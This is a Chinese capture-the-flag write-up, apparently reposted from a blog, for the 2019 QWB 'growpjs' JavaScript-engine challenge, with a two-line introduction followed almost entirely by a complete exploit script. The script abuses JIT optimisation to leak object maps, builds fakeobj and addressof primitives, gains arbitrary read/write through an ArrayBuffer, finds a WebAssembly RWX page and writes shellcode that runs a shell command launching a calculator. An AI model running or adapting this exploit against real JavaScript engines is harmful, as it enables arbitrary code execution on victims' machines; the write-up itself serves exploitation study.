2019QWB growpjs
2023-12-20 23:40:31
第一次知道原来各种map也是申请的一段连续的内存空间来存储,所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里的获取的时候要保证对象不被释放。
这也是做的第一道涉及优化器的题目,收货很多
class Memory{
constructor(){
this.buf = new ArrayBuffer(8);
this.f64 = new Float64Array(this.buf);
this.u32 = new Uint32Array(this.buf);
this.bytes = new Uint8Array(this.buf);
}
d2u(val){ //double ==> Uint64
this.f64[0] = val;
let tmp = Array.from(this.u32);
return tmp[1] * 0x100000000 + tmp[0];
}
u2d(val){ //Uint64 ==> double
let tmp = [];
tmp[0] = parseInt(val % 0x100000000);
tmp[1] = parseInt((val - tmp[0]) / 0x100000000);
this.u32.set(tmp);
return this.f64[0];
}
}
function hex(i)
{
return i.toString(16).padStart(16, "0");
}
var store=[];
var mem=new Memory();
function readmap_()
{
var map_obj=[1.1,2.2,3.3];
var map_tmp={x:3};
return [map_obj[map_tmp.x],map_obj,map_tmp];
}
function readmap()
{
for(let i=0;i<12000;i++)readmap_();
return readmap_()[0];
}
var float_map=mem.d2u(readmap());
var obj_map=float_map+0xa0;
console.log("[*] float_map is 0x"+hex(float_map));
console.log("[*] obj_map is 0x"+hex(obj_map));
var float_mapp=mem.u2d(float_map);
var obj_mapp=mem.u2d(obj_map);
function fakeobj_(address)
{
var arr_1=[address,address,address];
var tmp_1={x:3};
arr_1[tmp_1.x]=obj_mapp;
return arr_1;
}
function fakeobj(address)
{
for(let i=0;i<12000;i++)
{
var tmp=fakeobj_(address);
}
return tmp[0];
}
var float_obj=fakeobj(float_mapp);
function addressof_(object)
{
var arr_2=[object,object,object];
var tmp_2={x:3};
arr_2[tmp_2.x]=float_obj;
return arr_2;
}
function addressof(object)
{
for(let i=0;i<12000;i++)
{
var tmp=addressof_(object);
}
return tmp[0];
}
var objt={'a':1};
var arbf=new ArrayBuffer(0x1234);
var obj={'a':mem.u2d(0x5678)};
var fakeArray=[
float_mapp,
mem.u2d(0),
mem.u2d(0),
mem.u2d(0x100000000000),
1.1,
2.2
].slice(0);
var fakeArrayaddr=mem.d2u(addressof(fakeArray));
fakeArray[2]=mem.u2d(fakeArrayaddr);
var victim=fakeobj(mem.u2d(fakeArrayaddr+0x190));
console.log("[*] fakeArrayaddr is "+hex(fakeArrayaddr));
//console.log("[*] victim length is 0x"+hex(victim.length));
var buf_idx=0;
var obj_idx=0;
var max_idx=0x300;
for(let i=0;i<max_idx;i++)
{
let t=mem.d2u(victim[i]);
if(t==0x1234)buf_idx=i+1;
if(t==0x5678)obj_idx=i;
}
class ArbitraryRW
{
addressof(newobj)
{
obj.a=newobj;
return mem.d2u(victim[obj_idx]);
}
read64(address)
{
victim[buf_idx]=mem.u2d(address);
var dt=new DataView(arbf);
return mem.d2u(dt.getFloat64(0,true));
}
}
var arw=new ArbitraryRW();
var objarray=[objt,objt];
var objaddr=arw.addressof(objt);
console.log("[*] objaddr is 0x"+hex(objaddr));
console.log("[*] buf_idx is 0x"+hex(buf_idx));
console.log("[*] obj_idx is 0x"+hex(obj_idx));
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
let wasmFunc = wasmInstance.exports.main;
var inst_addr=arw.addressof(wasmInstance);
var rwx_addr=arw.read64(inst_addr+0x88-1);
console.log("[*] inst_addr is 0x"+hex(inst_addr));
console.log("[*] rwx_addr is 0x"+hex(rwx_addr));
//write shellcode to the rwx address
victim[buf_idx]=mem.u2d(rwx_addr);
var dt=new DataView(arbf);
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);
for (var i=0;i<shellcode.length;i++) {
dt.setUint8(i,shellcode[i], true);
}
wasmFunc();
文章来源:https://blog.csdn.net/weixin_46483787/article/details/135103924
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!